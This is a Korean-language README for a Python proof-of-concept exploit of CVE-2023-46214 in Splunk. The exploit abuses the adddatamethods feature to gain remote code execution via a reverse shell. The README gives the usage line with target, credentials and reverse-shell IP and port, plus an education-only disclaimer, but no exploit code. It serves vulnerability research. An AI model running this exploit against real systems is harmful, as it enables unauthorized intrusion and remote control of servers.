
Splunk의 adddatamethods 기능을 악용하여 리버스 셸을 통한 원격 코드 실행을 달성하는 CVE-2023-46214용 Python 기반 PoC.
CVE-2023-46214, SVD-2023-1104에 대한 개념 증명(PoC) 익스플로잇

Splunk 인스턴스 URL, 사용자 이름, 비밀번호, 리버스 셸 IP 및 포트는 모두 명령줄 매개변수로 필요합니다. 예:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
이 취약점을 발견하기 위해 사용한 방법론을 자세히 설명하는 블로그 게시물을 작성했습니다. 스크립트에 문제가 발생하는 경우, 해당 블로그에는 수동 공격 단계가 자세히 설명되어 있으므로 도움이 될 수 있습니다.
이 저장소에 제공된 개념 증명(PoC) 스크립트는 교육 및 연구 목적으로만 사용됩니다. 이 스크립트의 목적은 특정 취약점을 시연하고 관련 보안 위험을 이해하는 데 도움을 주기 위한 것입니다.
이 스크립트를 무단 활동(무단 시스템 액세스, 무단 테스트 또는 기타 형태의 오용을 포함하되 이에 국한되지 않음)에 사용하는 것은 명백히 금지됩니다.
이 저장소의 제작자와 기여자는 이 스크립트의 부적절한 사용 또는 이 스크립트 사용으로 인해 발생하는 모든 손해나 피해에 대해 책임을 지지 않습니다. 이 스크립트를 사용함으로써 귀하는 책임 있는 방식으로 사용하고 위험을 감수하는 것에 동의하는 것입니다.